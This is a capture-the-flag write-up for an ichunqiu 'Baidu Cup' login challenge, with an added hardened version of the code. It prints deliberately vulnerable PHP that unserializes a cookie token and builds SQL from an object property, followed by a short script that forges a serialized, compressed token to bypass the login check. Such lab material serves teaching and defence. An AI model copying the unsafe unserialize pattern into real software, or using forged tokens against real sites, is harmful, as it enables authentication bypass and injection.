"Baidu Cup" CTF Competition in October_Login

The challenge is hosted on the i春秋 (ichunqiu) CTF base camp.

Opening the page shows two login input boxes, so the first step is to check whether they are injectable.

After trying various statements, I found that there seems to be no injection in the login interface

Viewing the source code of the web page reveals an account.

After logging in with that account and password, the site redirects to member.php, which itself shows no hint.

Then I captured the packets to take a look. I spent a long time looking here, and finally found a parameter in the headers of the response packet.

Try adding the show parameter to the request header:

 

The response returns a piece of source code, so the code audit begins:

 <?php
    include 'common.php';
    $requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
    class db
    {
        public $where;
        function __wakeup()
        {
            if(!empty($this->where))
            {
                $this->select($this->where);
            }
        }

        function select($where)
        {
            $sql = mysql_query('select * from user where '.$where);
            return @mysql_fetch_array($sql);
        }
    }

    if(isset($requset['token']))
    {
        $login = unserialize(gzuncompress(base64_decode($requset['token'])));
        $db = new db();
        $row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
        if($login['user'] === 'ichunqiu')
        {
            echo $flag;
        }else if($row['pass'] !== $login['pass']){
            echo 'unserialize injection!!';
        }else{
            echo "(╯‵□′)╯︵┴─┴ ";
        }
    }else{
        header('Location: index.php?error=1');
    }

?> 

Look at the key logic statement:

$login = unserialize(gzuncompress(base64_decode($requset['token'])));

Next, look at the conditional statement:

if($login['user'] === 'ichunqiu')
        {
            echo $flag;
        }

So we need to supply a token parameter in the cookie. First create an array whose user key is set to ichunqiu, then apply the above series of operations in reverse (serialize, gzcompress, base64_encode):

<?php
// Build the array the server expects, then reverse its decode chain
$a = array('user'=>'ichunqiu');
$b = base64_encode(gzcompress(serialize($a)));
echo $b;
?>

Get the value of the token:

Add this value as the token cookie in the request, and the flag is returned directly.
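A hardened form of the token check audited above, as an added example that is not part of the original post or of the challenge's code. It authenticates the token with an HMAC before decoding it and uses JSON instead of unserialize(). The names TOKEN_KEY, issue_token, verify_token and the exp field are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for the token handling in member.php.
// TOKEN_KEY and both function names are assumptions, not the challenge's code.
const TOKEN_KEY = 'replace-with-random-server-side-secret'; // placeholder value

// Issue a token only after the server itself has verified the password.
function issue_token(string $user): string
{
    $payload = base64_encode(json_encode(['user' => $user, 'exp' => time() + 3600]));
    $mac = hash_hmac('sha256', $payload, TOKEN_KEY);
    return $payload . '.' . $mac;
}

// Return the authenticated user name, or null if the token cannot be trusted.
function verify_token(string $token): ?string
{
    $parts = explode('.', $token);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $mac] = $parts;
    // Authenticate the raw bytes before decoding; hash_equals is constant-time.
    if (!hash_equals(hash_hmac('sha256', $payload, TOKEN_KEY), $mac)) {
        return null;
    }
    // JSON yields only scalars and arrays, so no __wakeup() gadget can run.
    $data = json_decode(base64_decode($payload, true) ?: '', true);
    if (!is_array($data) || !is_string($data['user'] ?? null)
        || !is_int($data['exp'] ?? null) || $data['exp'] < time()) {
        return null;
    }
    return $data['user'];
}

// The token built in the write-up carries no MAC, so verify_token() rejects it;
// a token produced by issue_token() after a real login is accepted.
$forged = base64_encode(gzcompress(serialize(['user' => 'ichunqiu'])));
var_dump(verify_token($forged));
var_dump(verify_token(issue_token('ichunqiu')));
```

In a real handler the token would be read from $_COOKIE only, not from the merged GET/POST/SESSION/COOKIE array, so a request parameter cannot override session state.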

 


Origin http://43.154.161.224:23101/article/api/json?id=324829255&siteId=291194637